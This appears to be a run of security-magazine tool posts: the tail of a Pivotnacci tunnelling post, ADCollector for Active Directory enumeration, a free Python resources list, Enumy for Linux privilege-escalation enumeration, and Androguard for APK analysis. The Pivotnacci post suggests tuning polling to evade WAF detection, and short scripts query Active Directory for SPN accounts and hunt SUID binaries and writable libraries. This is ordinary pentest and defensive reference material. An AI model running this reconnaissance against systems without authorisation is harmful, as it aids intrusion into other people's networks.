Setting a different agent message 418 I'm a teapot (the ACK_MESSAGE variable must be modified on the agent side as well):

pivotnacci https://domain.com/agent.aspx --ack-message "418 I'm a teapot"

Reduce detection rate (e.g. WAF) by setting the polling interval to 2 seconds:

pivotnacci  https://domain.com/agent.php --polling-interval 2000

Author

Eloy Pérez (@Zer1t0) [ www.blackarrow.net - www.tarlogic.com ]


The post Pivotnacci - A tool to make socks connections through HTTP agents appeared first on Hakin9 - IT Security Magazine.

ADCollector - A lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending.


ADCollector is a lightweight tool that enumerates the Active Directory environment to identify possible attack vectors. It will give you a basic understanding of the configuration/deployment of the environment as a starting point.

Notes:

ADCollector is not an alternative to the powerful PowerView, it just automates enumeration to quickly identify juicy information without thinking too much at the early Recon stage. Functions implemented in ADCollector are ideal for enumeration in a large Enterprise environment with lots of users/computers, without generating lots of traffic and taking a large amount of time. It only focuses on extracting useful attributes/properties/ACLs from the most valuable targets instead of enumerating all available attributes from all the user/computer objects in the domain. You will definitely need PowerView to do more detailed enumeration later.

The aim of developing this tool is to help me learn more about Active Directory security from a different perspective as well as to figure out what's behind the scenes of those PowerView functions. I just started learning .NET with C#, the code could be really terrible~

It uses the System.DirectoryServices (S.DS) namespace to retrieve domain/forest information from the domain controller (LDAP server). It also utilizes the System.DirectoryServices.Protocols (S.DS.P) namespace for LDAP searching.
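
ADCollector does this in C# via S.DS.P, but as a rough illustration, an equivalent LDAP query for one of its checks (user accounts with an SPN set) could look like the following in Python with ldap3; the server, credentials and base DN are placeholders:

from ldap3 import Server, Connection, NTLM, SUBTREE

# Placeholder DC, credentials and base DN
server = Server("dc01.lab.local")
conn = Connection(server, user="LAB\\someuser", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)

# Well-known filter for user objects that have a servicePrincipalName set
conn.search(
    search_base="DC=lab,DC=local",
    search_filter="(&(samAccountType=805306368)(servicePrincipalName=*))",
    search_scope=SUBTREE,
    attributes=["sAMAccountName", "servicePrincipalName"],
)

for entry in conn.entries:
    print(entry.sAMAccountName, list(entry.servicePrincipalName))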

This tool is still under construction. Features that will be implemented can be seen on my project page.

Enumeration

  • Current Domain/Forest information
  • Domains in the current forest (with domain SIDs)
  • Domain Controllers in the current domain [GC/RODC] (with IP, OS, Site and Roles)
  • Domain/Forest trusts as well as trusted domain objects [SID filtering status]
  • Privileged users (currently in DA and EA group)
  • Unconstrained delegation accounts (Excluding DCs)
  • Constrained Delegation (S4U2Self, S4U2Proxy, Resources-based constrained delegation)
  • MSSQL/Exchange/RDP/PS Remoting SPN accounts
  • User accounts with SPN set & accounts whose passwords never expire
  • Confidential attributes
  • ASREPRoast (DontRequirePreAuth accounts)
  • AdminSDHolder protected accounts
  • Domain attributes (MAQ, minPwdLength, maxPwdAge, lockoutThreshold, gpLink [group policies linked to the current domain object])
  • LDAP basic info (supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
  • Kerberos Policy
  • Interesting ACLs on the domain object, resolving GUIDs (User defined object in the future)
  • Unusual DCSync Accounts
  • Interesting ACLs on GPOs
  • Interesting descriptions on user objects
  • Accounts marked sensitive & cannot be delegated
  • Group Policy Preference cpassword in SYSVOL/Cache
  • Effective GPOs on the current user/computer
  • Restricted groups
  • Nested Group Membership

Usage

C:\Users> ADCollector.exe  -h

      _    ____   ____      _ _             _
     / \  |  _ \ / ___|___ | | | ___  ___ _| |_ ___  _ __
    / _ \ | | | | |   / _ \| | |/ _ \/ __|_  __/ _ \| '__|
   / ___ \| |_| | |__| (_) | | |  __/ (__  | || (_) | |
  /_/   \_\____/ \____\___/|_|_|\___|\___| |__/\___/|_|

  v1.1.4  by dev2null

Usage: ADCollector.exe -h
    
    --Domain (Default: current domain)
            Enumerate the specified domain

    --Ldaps (Default: LDAP)
            Use LDAP over SSL/TLS

    --Spns (Default: no SPN scanning)
            Enumerate SPNs

    --Term (Default: 'pass')
            Term to search in user description field

    --Acls (Default: 'Domain object')
            Interesting ACLs on an object

Example: .\ADCollector.exe --SPNs --Term key --ACLs 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

Changelog

v 1.1.1:

1. It now uses the S.DS.P namespace to perform search operations, making searches faster and easier to implement. (It also supports paged search.)
2. It now supports searching in other domains. (command line parser is not implemented yet).
3. The code logic is reconstructed, less code, more understandable and cohesive.

v 1.1.2:

1. Separated into three classes.
2. Dispose ldap connection properly.
3. Enumerations: AdminSDHolder, Domain attributes (MAQ, minPwdLength, maxPwdAge, lockOutThreshold, GPOs linked to the domain object), accounts that don't need pre-authentication.
4. LDAP basic info (supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
5. SPN scanning (SPNs for MSSQL, Exchange, RDP and PS Remoting)
6. Constrained Delegation enumerations (S4U2Self, S4U2Proxy as well as Resources-based constrained delegation)
7. RODC (group that administers the RODC)

v 1.1.3:

1. Fixed SPN scanning results and privileged accounts group membership
2. Password does not expire accounts; User accounts with SPN set; 
3. Kerberos Policy
4. Interesting ACLs enumeration for the domain object, resolving GUIDs
5. DC info is back

v 1.1.4:

1. Some bugs are killed and some details are improved
2. SPN scanning is now optional
3. GPP cpassword in SYSVOL/Cache
4. Interesting ACLs on GPOs; Interesting descriptions on user objects;
5. Unusual DCSync accounts; Sensitive & not delegate accounts
6. Effective GPOs on user/computer
7. Restricted groups
8. Nested Group Membership

Project

For more information (current progress/Todo list/etc) about this tool, you can visit my project page

The post ADCollector - A lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending. appeared first on Hakin9 - IT Security Magazine.


List of Free Python Resources [Updated June 2020]


Python is considered a beginner-friendly programming language, and its community provides many free resources for beginners and more advanced users. Our team has gathered the most helpful free materials about Python. Below you will find the whole list. If we missed something that you would like to recommend, leave a comment! We will update our list!


How to start?

If you have never had a chance to learn programming and this is your first experience, here you will find free books, blogs and video tutorials that will help you.

  • Let's start with CheersKevin's short video How to Learn to Code, where he explains why it's better to think of projects you'd like to build and problems you want to solve with programming. Start working on those projects and problems rather than jumping into a specific language that's recommended to you by a friend.
  • CS for All is an open book by professors at Harvey Mudd College which teaches the fundamentals of computer science using Python. It's a perfect read for programming beginners.
  • If you've never programmed before, check out Laurence Bradford's blog Learn To Code with Me. She's done an incredible job of presenting the most important steps in your programming career. With her materials you will quickly understand the basics. She also has a podcast about programming, so it's worth checking out!
  • Learn Python the Hard Way is a free book by Zed Shaw.
  • The Python projects tag on the Twilio blog presents many tutorials about Python and what you can create with it. It's updated regularly.
  • A Byte of Python is a beginner's tutorial for the Python language.
  • Introduction to Programming with Python goes over the basic syntax and control structures in Python. The free book has numerous code examples.
  • Python Practice Book is a book of Python exercises to help you learn the basic language syntax.
  • Python for you and me is an approachable book with sections for Python syntax and the major language constructs. The book also contains a short guide at the end to get programmers to write their first Flask web application.
  • Automate the Boring Stuff with Python by Al Sweigart. It's an amazing book that won't bore you. If you like it, I recommend checking out the other books written by Al Sweigart. They are all available for free, but you can purchase them too.
  • Program Arcade Games with Python and Pygame is another good book about Python. The bonus: it is available for free in multiple languages. 
  • Python Tutorial for Beginners: Learn Programming in 7 Days is a comprehensive guide for beginners looking for a step-by-step tutorial. This class will teach you Python from the basics.
  • RealPython - The website offers various materials from interactive exercises to tutorials. It's a great place for beginners.
  • Learn Python - another amazing website with tutorials prepared for beginners. What's more, you will find tutorials for other programming languages, so you can try other options as well.
  • CodersLegacy - an educational site created to train future generations in the art of coding. They are not only focused on Python but on other programming languages as well. Beginners and more advanced users will find interesting information there, as the content is divided into sections to ease navigation. It also has a side blog where programming-related articles are published.

Python for experienced users

If you already know the basics of Python or know another language this list will expand your knowledge.

  • Learn Python in y minutes provides an in-depth journey into the Python language. The guide is especially useful if you're coming in with previous software development experience and want to quickly grasp how the language is structured.

  • How to Develop Quality Python Code is good material if you are planning to learn about development environments, application dependencies and project structure.
  • The Python module of the week chapters are a good way to get up to speed with the standard library. Doug Hellmann is also updating the list for changes brought about from the upgrade to Python 3 from 2.x.
  • Composing Programs shows how to build compilers with Python 3. This tutorial is especially useful if you're looking to learn both more about the Python language and how compilers work.
  • Good to Great Python Reads is a small collection of intermediate and advanced Python articles that focus on nuances and details of the Python language itself.
  • Mark Pilgrim created two versions of Dive Into Python, one for Python 2 and the other for Python 3. Both are worth checking out!
  • Obey the Testing Goat is a book heavily focused on web programming with Python and how to test that, so keep that in mind.
  • TryPython is great because the website itself has a built-in Python interpreter. This means you can play around with Python coding right on the website, eliminating the need for you to muck around and install interpreters on your system.


Videos, screencasts and presentations

If you prefer to learn Python programming by watching videos then this is the resource for you. There are dozens of amazing technical tutorials and great speakers that will teach you about Python. We narrowed the list down to our favorite channels.

  • PyVideo organizes and indexes thousands of Python videos from both major conferences and meetups.
  • Want to learn like they learn in the classroom? Video tutorials are the way to go. Then you have to watch the series of Python video tutorials by theNewBoston. You get end-to-end coverage of Python by following these video tutorials.
  • Sentdex created many Python programming tutorials, going further than just the basics. Learn about machine learning, finance, data analysis, robotics, web development, game development and more.
  • Programming Knowledge - another YouTube channel with an amazing list of video tutorials about Python for beginners. But that's not all: in their playlists you will find tutorials about other programming languages too. All in one!


Curated Python packages lists

  • awesome-python is an incredible list of Python frameworks, libraries and software. 

  • easy-python is like awesome-python although instead of just a Git repository this site is in the Read the Docs format.


Podcasts

  • Talk Python to Me focuses on the people and organizations coding on Python. Each episode features a different guest interviewee to talk about his or her work.

  • Podcast.init is another regular podcast that presents stories about Python and interviews "with the people who make it great".
  • Test and Code Podcast focuses on testing and related topics 
  • Python Bytes is a new podcast from the creators of the above mentioned "Talk Python to Me" and "Test and Code Podcast".
  • Import This is a podcast from Ken Reitz and Alex Gaynor with very in-depth interviews with influential Python community members. It's not updated as often as others, but it's still worth checking. 


Interactive  Lessons

  • Google's Python Class - The class includes written materials, lecture videos, and lots of code exercises to practice Python coding. The class is designed to introduce Python to people who have a little programming experience.

  • exercism.io - Exercism uses peer review to improve general programming techniques. The community there is very active, and will comment on your programming techniques. It's the best way to improve your skills and meet some amazing people.

  • Python Challenge - The Python Challenge is a game in which each level can be solved by a bit of programming. The level of difficulty can get tricky pretty quickly for beginners, but the challenges are still a very fun and useful way to test your skills. 

  • Computer Science Circles - This website teaches computer programming. This skill is very useful: with programming you can automate computer tasks, make art and music, interpret and analyze survey results, build tools for other people, create custom websites, write games, examine genetic data, connect people with each other, and the list goes on and on.
  • How to Think Like a Computer Scientist, Interactive Edition - This interactive book is a product of the Runestone Interactive Project at Luther College, led by Brad Miller and David Ranum.  The single most important skill for a computer scientist is problem solving. Problem solving means the ability to formulate problems, think creatively about solutions, and express a solution clearly and accurately. As it turns out, the process of learning to program is an excellent opportunity to practice problem solving skills. 
  • Practice Python - There are over 30 beginner Python exercises just waiting to be solved. Each exercise comes with a small discussion of a topic and a link to a solution.  Every month you will find new exercises. 
  • w3resource - w3resource.com was created with the aim of being the largest online web development resource, which beginners can use as a comprehensive learning resource and experienced web developers can use as a reference.
  • Udemy - If you have ever looked for interactive, video-based tutorials, you have definitely heard about Udemy. The included list contains only free materials, so all you have to do is dive in and start learning Python!
  • RegexTester -  Free Online Toolbox for developers. This online tool allows you to test regular expression in JavaScript and PCRE (Python, PHP). It also allows you to generate a string example from a RegEx.

Did I miss a book or video tutorial that you recommend?

Be sure to leave a comment in the form below and let us know!

The post List of Free Python Resources [Updated June 2020] appeared first on Hakin9 - IT Security Magazine.

Enumy - Linux post exploitation privilege escalation enumeration


Enumy is an ultra-fast portable executable that you drop on a target Linux machine during a pentest or CTF in the post-exploitation phase. Running enumy will enumerate the box for common security vulnerabilities.

Installation

You can download the final binary (statically linked against musl) from the x86 or x64 release tab. Transfer the enumy binary to the target machine, then run it:

./enumy

Who Should Use Enumy

  • Pentesters can run it on a target machine to find raisable issues for their reports.
  • CTF players can use it to identify things that they might have missed.
  • People who are curious to know how many issues enumy finds on their local machine.

Options

$ ./enumy64 -h

 ▄█▀─▄▄▄▄▄▄▄─▀█▄  _____
 ▀█████████████▀ |   __|___ _ _ _____ _ _
     █▄███▄█     |   __|   | | |     | | |
      █████      |_____|_|_|___|_|_|_|_  |
      █▀█▀█                          |___|


------------------------------------------

Enumy - Used to enumerate the target environment and look for common
security vulnerabilities and hostspots

 -o <loc>     Save results to location
 -i <loc>     Ignore files in this directory (usefull for network shares)
 -w <loc>     Only walk files in this directory (usefull for devlopment)
 -t <num>     Threads (default 4)
 -f           Run full scans
 -s           Show missing shared libaries
 -d           Debug mode
 -h           Show help

Compilation

To compile during development, make and the libcap library are all that is required.

sudo apt-get install libcap-dev
make

To remove the glibc dependency and statically link all libraries (compile with musl), do the following. Note that to do this you will need Docker installed to create the Alpine build environment.

./build.sh 64bit
./build.sh 32bit
./build.sh all
cd output

Scans That've Been Implemented

Below is the ever-growing list of scans that have been implemented.

Scan Type Quick Scan Full Scan Implemented
SUID/GUID Scan ✔ ✔ ✔
File Capabilities Scan ✔ ✔ ✔
Interesting Files Scan ✔ ✔ ✔
Coredump Scan ✔ ✔ ✔
Breakout Binaries Scan ✔ ✔ ✔
SSHD Configuration Scan ✔ ✔ ✔
Sysctl Scan ✔ ✔ ✔
Living Off The Land Scan ✔ ✔ ✔
Current User Scan ✔ ✔ ✔
*.so Injection Scan ❌ ✔ ✔
Permissions Scan ❌ ✔ ❌
Docker Scan ✔ ✔ ❌
Environment Scan ✔ ✔ ❌
Privileged Access Scan ✔ ✔ ❌
Networking Scan ✔ ✔ ❌
System Info Scan ✔ ✔ ❌
Version Information Scan ✔ ✔ ❌
Default Weak Credentials Scan ✔ ✔ ❌
Weak Crypto Scan ❌ ✔ ❌

Scan Times

Changing the default number of threads is pretty pointless unless you're running a full scan. A full scan will do a lot more IO, so more threads greatly decrease scan times. These are the scan times with an i7-8700K and 2 million files scanned. 🐂

Scan types

SUID GUID Scan

The idea of this scan is to enumerate the system looking for SUID/GUID binaries that are abnormal or have weak permissions that can be exploited.
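
As a rough illustration of the concept (a minimal Python sketch, not enumy's actual C implementation; /usr/bin is just an example search path):

#!/usr/bin/env python3
# Minimal sketch: walk a directory tree and report files with the SUID or SGID bit set.
import os
import stat

def find_suid_sgid(root="/usr/bin"):
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished file
            if mode & (stat.S_ISUID | stat.S_ISGID):
                yield path

if __name__ == "__main__":
    for suspicious in find_suid_sgid():
        print("SUID/SGID bit set:", suspicious)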

File Capabilities Scan

The Linux kernel has supported capabilities for some time now; this is the preferred way to give a file a subset of root's powers in order to mitigate risk. Although this is a much safer way of doing things, if you're lucky enough to find abnormal capabilities set on a file, then it's quite possible that you can exploit the executable to gain higher access. Enumy will check the capabilities set on all executable files on the system.
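
A simplified way to picture this check (a Python sketch that only flags files carrying the security.capability extended attribute on Linux; enumy itself decodes the actual capability bits):

#!/usr/bin/env python3
# Sketch: list files in a directory that have Linux file capabilities set,
# detected via the security.capability extended attribute.
import os

def files_with_capabilities(directory="/usr/bin"):
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        try:
            os.getxattr(entry.path, "security.capability")
        except OSError:
            continue  # no capabilities set, or attribute not readable
        yield entry.path

if __name__ == "__main__":
    for path in files_with_capabilities():
        print("capabilities set on:", path)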

Interesting Files Scan

This is more of a generic scan that will try and categorize a file-based off its contents, file extension, and file name. Enumy will look for files such as private keys, passwords, and backup files.

Coredump Scan

Coredump files are a type of ELF file that contains a process's address space when the program terminates unexpectedly. Now imagine if this process's memory was readable and contained sensitive information. Or even more exciting, this coredump could be for an internally developed tool that segfaulted, allowing you to develop a zero-day.

Breakout Binary Scan

Some files should never have the SUID bit set. It's quite common for a lazy sysadmin to give a file like docker, ionice, or hexdump the SUID bit to make a bash script work or to make their life easier. This scan tries to find some known-bad SUID binaries.

Sysctl Parameter Hardening

Sysctl is used to modify kernel parameters at runtime. It's also possible to query these kernel parameters and check to see if important security measures like ASLR are enabled.
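
For example, checking the ASLR setting mentioned above only takes a few lines (a hedged sketch; enumy checks far more sysctl values than this):

#!/usr/bin/env python3
# Sketch: read kernel.randomize_va_space from procfs to check the ASLR setting.
# 2 = full randomization, 1 = partial, 0 = disabled.
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

try:
    with open(ASLR_PATH) as handle:
        value = handle.read().strip()
except OSError as error:
    print("could not read", ASLR_PATH, "-", error)
else:
    if value == "2":
        print("ASLR is fully enabled")
    else:
        print("ASLR is weak or disabled (randomize_va_space =", value + ")")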

Living Off The Land scan

Living off the land is a technique where attackers weaponize what's already on the system, among other reasons to remain stealthy. This scan enumerates the files that an attacker would be looking for.

Dynamic Shared Object Injection Scan

This scan will parse ELF files for their dependencies. If we have write access to any of these dependencies, or write access to any DT_RPATH or DT_RUNPATH locations, then we can drop our own malicious shared object into that executable's search path, potentially compromising the system.
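
To make the idea concrete, here is a simplified Python sketch that shells out to ldd instead of parsing the ELF headers the way enumy does (the default target binary is just an example):

#!/usr/bin/env python3
# Sketch: list shared-object dependencies of a binary (via ldd) that the
# current user could overwrite, i.e. candidates for *.so injection.
import os
import subprocess
import sys

def writable_dependencies(binary):
    result = subprocess.run(["ldd", binary], capture_output=True, text=True)
    for line in result.stdout.splitlines():
        if "=>" not in line:
            continue
        fields = line.split("=>", 1)[1].split()
        if fields and os.path.isfile(fields[0]) and os.access(fields[0], os.W_OK):
            yield fields[0]

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/bin/ls"
    for dependency in writable_dependencies(target):
        print("writable dependency:", dependency)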

SSH Misconfiguration Scan

SSH is one of the most common services that you will find in the real world. It's also quite easy to misconfigure it. This scan will check to see if it can be hardened in any way.

Current User Scan

The current user scan just parses /etc/passwd. With this information, we can find root accounts, unprotected accounts, missing home directories, etc.
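
The same idea fits in a few lines of Python (a simplified sketch of the concept, not enumy's code):

#!/usr/bin/env python3
# Sketch: parse /etc/passwd and flag UID 0 accounts and missing home directories.
import os

with open("/etc/passwd") as passwd:
    for line in passwd:
        name, _pw, uid, _gid, _gecos, home, shell = line.rstrip("\n").split(":")
        if uid == "0":
            print(f"root-level account: {name} (shell: {shell})")
        if home and not os.path.isdir(home):
            print(f"missing home directory: {name} -> {home}")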

How To Contribute

  • If you can think of a scan idea that has not been implemented, raise it as an issue.
  • If you know how to program, make a pull request :)

Benchmarks

Scan Type Files Scanned Threads Time
Quick scan 1.8 Million 1 54 seconds
Quick scan 1.8 Million 2 26 seconds
Quick scan 1.8 Million 4 15 seconds
Quick scan 1.8 Million 6 15 seconds
Quick scan 1.8 Million 12 20 seconds
Full scan 1.8 Million 1 196 seconds
Full scan 1.8 Million 2 93 seconds
Full scan 1.8 Million 4 47 seconds
Full scan 1.8 Million 6 30 seconds
Full scan 1.8 Million 12 29 seconds

More: https://github.com/luke-goddard/enumy

The post Enumy - Linux post exploitation privilege escalation enumeration appeared first on Hakin9 - IT Security Magazine.

Androguard - Python tool to play with Android files


Androguard is a full python tool to play with Android files. It is designed to work with Python 3 only.

  • DEX, ODEX
  • APK
  • Android’s binary XML
  • Android resources
  • Disassemble DEX/ODEX bytecodes
  • Decompiler for DEX/ODEX files

You can either use the CLI or graphical frontend for androguard, or use androguard purely as a library for your own tools and scripts.

Authors: Androguard Team

Androguard + tools: Anthony Desnos (desnos at t0t0.fr).

DAD (DAD is A Decompiler): Geoffroy Gueguen (geoffroy dot gueguen at gmail dot com)

Installation

There are several ways to install androguard.

Before you start, make sure you are using a supported python version! For Windows, we recommend using the Anaconda python 3.6.x package.

Warning: The magic library might not work out of the box. If your magic library does not work, please refer to the installation instructions of python-magic.

PIP

The usual way to install python packages is from pypi.python.org with its package installer pip. Just use:

$ pip install -U androguard[magic,GUI]

to install androguard including the GUI and magic file type detection. In order to use features that use dot, you need Graphviz installed. This is not a python dependency but a binary package! Please follow the installation instructions for GraphvizInstall.

You can also make use of a virtualenv to separate the installation from your system-wide packages:

$ virtualenv venv-androguard
$ source venv-androguard/bin/activate
$ pip install -U androguard[magic,GUI]

pip should install all required packages too.

Debian / Ubuntu

Debian has androguard in its repository. You can just install it using apt install androguard. All required dependencies are automatically installed.

Install from Source

Use git to fetch the sources, then install it. Please install git and python on your own. Androguard requires Python at least 3.4 to work. Pypy >= 5.9.0 should work as well but is not tested.

$ git clone --recursive https://github.com/androguard/androguard.git
$ cd androguard
$ virtualenv -p python3 venv-androguard
$ source venv-androguard/bin/activate
$ pip install .[magic,GUI]

The dependencies, defined in setup.py will be automatically installed.

For development purposes, you might want to install the extra dependencies for docs and tests as well:

$ git clone --recursive https://github.com/androguard/androguard.git
$ cd androguard
$ virtualenv -p python3 venv-androguard
$ source venv-androguard/bin/activate
$ pip install -e .[magic,GUI,tests,docs]

You can then create a local copy of the documentation:

$ python3 setup.py build_sphinx

Which is generated in build/sphinx/html.

Getting Started

Using Androguard tools

There are already some tools for specific purposes.

To just decode the AndroidManifest.xml or resources.arsc, there are androguard axml and androguard arsc. To get information about the certificates use androguard sign.

If you want to create call graphs, use androguard cg, or if you want control flow graphs, you can use androguard decompile.

Using Androlyze and the python API

The easiest way to analyze APK files is by using androguard analyze. It will start an IPython shell with all modules loaded so you can get straight into action.

For analyzing and loading APK or DEX files, some wrapper functions exist. Use AnalyzeAPK(filename) or AnalyzeDEX(filename) to load a file and start analyzing it. There are already plenty of APKs in the androguard repo, you can either use one of those or start your own analysis.

$ androguard analyze
Androguard version 3.1.1 started
In [1]: a, d, dx = AnalyzeAPK("examples/android/abcore/app-prod-debug.apk")
# Depending on the size of the APK, this might take a while...

In [2]:

The three objects you get are a, an APK object; d, an array of DalvikVMFormat objects; and dx, an Analysis object.

Inside the APK object, you can find all information about the APK, like the package name, permissions, the AndroidManifest.xml, or its resources.

The DalvikVMFormat corresponds to the DEX file found inside the APK file. You can get classes, methods, or strings from the DEX file. But when using multi-DEX APKs, it might be a better idea to get those from another place: the Analysis object should be used instead, as it contains special classes which link information about the classes.dex and can even handle many DEX files at once.

Getting Information about an APK

If you have successfully loaded your APK using AnalyzeAPK, you can now start getting information about the APK.

For example, getting the permissions of the APK:

In [2]: a.get_permissions()
Out[2]:
['android.permission.INTERNET',
 'android.permission.WRITE_EXTERNAL_STORAGE',
 'android.permission.ACCESS_WIFI_STATE',
 'android.permission.ACCESS_NETWORK_STATE']

or getting a list of all activities, which are defined in the AndroidManifest.xml:

In [3]: a.get_activities()
Out[3]:
['com.greenaddress.abcore.MainActivity',
 'com.greenaddress.abcore.BitcoinConfEditActivity',
 'com.greenaddress.abcore.AboutActivity',
 'com.greenaddress.abcore.SettingsActivity',
 'com.greenaddress.abcore.DownloadSettingsActivity',
 'com.greenaddress.abcore.PeerActivity',
 'com.greenaddress.abcore.ProgressActivity',
 'com.greenaddress.abcore.LogActivity',
 'com.greenaddress.abcore.ConsoleActivity',
 'com.greenaddress.abcore.DownloadActivity']

Get the package name, app name, and path of the icon:

In [4]: a.get_package()
Out[4]: 'com.greenaddress.abcore'

In [5]: a.get_app_name()
Out[5]: u'ABCore'

In [6]: a.get_app_icon()
Out[6]: u'res/mipmap-xxxhdpi-v4/ic_launcher.png'

Get the numeric version and the version string, and the minimal, maximal, target and effective SDK version:

In [7]: a.get_androidversion_code()
Out[7]: '2162'

In [8]: a.get_androidversion_name()
Out[8]: '0.62'

In [9]: a.get_min_sdk_version()
Out[9]: '21'

In [10]: a.get_max_sdk_version()

In [11]: a.get_target_sdk_version()
Out[11]: '27'

In [12]: a.get_effective_target_sdk_version()
Out[12]: 27

You can even get the decoded XML for the AndroidManifest.xml:

In [15]: a.get_android_manifest_axml().get_xml()
Out[15]: '<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="2162" android:versionName="0.62" package="com.greenaddress.abcore">\n<uses-sdk android:minSdkVersion="21" android:targetSdkVersion="27">\n</uses-sdk>\n<uses-permission android:name="android.permission.INTERNET">\n</uses-permission>\n<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE">\n</uses-permission>\n<uses-permission android:name="android.permission.ACCESS_WIFI_STATE">\n</uses-permission>\n<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE">\n</uses-permission>\n<application android:theme="@7F0F0006" android:label="@7F0E001D" android:icon="@7F0D0000" android:debuggable="true" android:allowBackup="false" android:supportsRtl="true">\n<activity android:name="com.greenaddress.abcore.MainActivity">\n<intent-filter>\n<action android:name="android.intent.action.MAIN">\n</action>\n<category android:name="android.intent.category.LAUNCHER">\n</category>\n</intent-filter>\n</activity>\n<service android:name="com.greenaddress.abcore.DownloadInstallCoreIntentService" android:exported="false">\n</service>\n<service android:name="com.greenaddress.abcore.RPCIntentService" android:exported="false">\n</service>\n<service android:name="com.greenaddress.abcore.ABCoreService" android:exported="false">\n</service>\n<activity android:name="com.greenaddress.abcore.BitcoinConfEditActivity">\n<intent-filter>\n<category android:name="android.intent.category.DEFAULT">\n</category>\n<action android:name="com.greenaddress.abcore.BitcoinConfEditActivity">\n</action>\n</intent-filter>\n</activity>\n<activity android:name="com.greenaddress.abcore.AboutActivity">\n</activity>\n<activity android:label="@7F0E0038" android:name="com.greenaddress.abcore.SettingsActivity" android:noHistory="true">\n</activity>\n<activity android:label="@7F0E0035" android:name="com.greenaddress.abcore.DownloadSettingsActivity" android:noHistory="true">\n</activity>\n<activity android:theme="@7F0F0006" android:label="@7F0E0036" android:name="com.greenaddress.abcore.PeerActivity">\n</activity>\n<activity android:theme="@7F0F0006" android:label="@7F0E0037" android:name="com.greenaddress.abcore.ProgressActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.LogActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.ConsoleActivity">\n</activity>\n<activity android:name="com.greenaddress.abcore.DownloadActivity">\n</activity>\n<receiver android:name="com.greenaddress.abcore.PowerBroadcastReceiver">\n<intent-filter>\n<action android:name="android.intent.action.ACTION_POWER_CONNECTED">\n</action>\n<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED">\n</action>\n<action android:name="android.intent.action.ACTION_SHUTDOWN">\n</action>\n<action android:name="android.intent.action.ACTION_BATTERY_LOW">\n</action>\n<action android:name="android.net.wifi.STATE_CHANGE">\n</action>\n</intent-filter>\n</receiver>\n</application>\n</manifest>\n'

Or if you like to use the AndroidManifest.xml as an ElementTree object, use the following method:

In [13]: a.get_android_manifest_xml()
Out[13]: <Element manifest at 0x7f9d01587b00>

There are many more methods to explore, just take a look at the API for APK.

Using the Analysis object

The ~androguard.core.analysis.analysis.Analysis object has all the information about the classes, methods, fields, and strings inside one or multiple DEX files.

Additionally, it enables you to get call graphs and cross-references (XREFs) for each method, class, field, and string.

This means you can investigate the application for certain API calls or create graphs to see the dependencies of different classes.

As a first example, we will get all classes from the Analysis:

In [2]: dx.get_classes()
Out[2]:
[<analysis.ClassAnalysis Ljava/io/FileNotFoundException; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/content/SharedPreferences; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/support/v4/widget/FocusStrategy$BoundsAdapter;>,
 <analysis.ClassAnalysis Landroid/support/v4/media/MediaBrowserCompat$MediaBrowserServiceCallbackImpl;>,
 <analysis.ClassAnalysis Landroid/support/transition/WindowIdImpl;>,
 <analysis.ClassAnalysis Landroid/media/MediaMetadataEditor; EXTERNAL>,
 <analysis.ClassAnalysis Landroid/support/v4/app/BundleCompat$BundleCompatBaseImpl;>,
 <analysis.ClassAnalysis Landroid/support/transition/MatrixUtils$1;>,
 <analysis.ClassAnalysis Landroid/support/v7/widget/ShareActionProvider;>,
 ...

As you can see, get_classes() returns a list of ClassAnalysis objects. Some of them are marked as EXTERNAL, which means that the source code of this class is not defined within the DEX files that are loaded inside the Analysis. For example the first class java.io.FileNotFoundException is an API class.

A ClassAnalysis does not contain the actual code, but the ClassDefItem can be loaded using get_vm_class():

In [5]: dx.get_classes()[2].get_vm_class()
Out[5]: <dvm.ClassDefItem Ljava/lang/Object;->Landroid/support/v4/widget/FocusStrategy$BoundsAdapter;>

If the class is EXTERNAL, an ExternalClass is returned instead.

The ClassAnalysis also contains all the information about XREFs, which are explained in more detail in the next section.

XREFs

Consider the following Java source code:

class Foobar {
    public int afield = 23;

    public void somemethod() {
        String astring = "hello world";
    }
}

class Barfoo {
    public void othermethod() {
        Foobar x = new Foobar();

        x.somemethod();

        System.out.println(x.afield);
    }
}

There are two classes and the class Barfoo instantiates the other class Foobar as well as calling methods and reading fields.

XREFs are generated for four things:

  • Classes
  • Methods
  • Fields
  • Strings

XREFs work in two directions: xref_from and xref_to. "To" means that the current object is calling another object. "From" means that the current object is called by another object.

All XREFs can be visualized as a directed graph and if some object A is contained in the xref_to, the called object will contain A in their xref_from.

In the case of our Java example, the string astring is used in Foobar.somemethod, therefore it will be contained in the xref_to of Foobar.somemethod.

The field afield will be contained in the xref_to of Barfoo.othermethod, as will the call to Foobar.somemethod.

More on XREFs can be found in xrefs.
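
As a small, hedged illustration of how XREFs are used in practice (exact attribute names can differ slightly between androguard versions; the APK path is the sample used earlier):

from androguard.misc import AnalyzeAPK

# Load the same sample APK used earlier in this article.
a, d, dx = AnalyzeAPK("examples/android/abcore/app-prod-debug.apk")

# Find every method named onCreate and print the methods that call it (xref_from).
for method in dx.find_methods(methodname="onCreate"):
    print("method:", method)
    for _caller_class, caller_method, offset in method.get_xref_from():
        print("    called from:", caller_method, "at offset", hex(offset))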

Documentation

Find the documentation for master on ReadTheDocs.

There are some (probably broken/outdated) examples and demos in the folders demos and examples.

Projects using Androguard

In alphabetical order

You are using Androguard and are not listed here? Just create a ticket or send us a pull request with your project!

The post Androguard - Python tool to play with Android files appeared first on Hakin9 - IT Security Magazine.

France's COVID-19 contact tracing app is now tested by 15,000+ ethical hackers


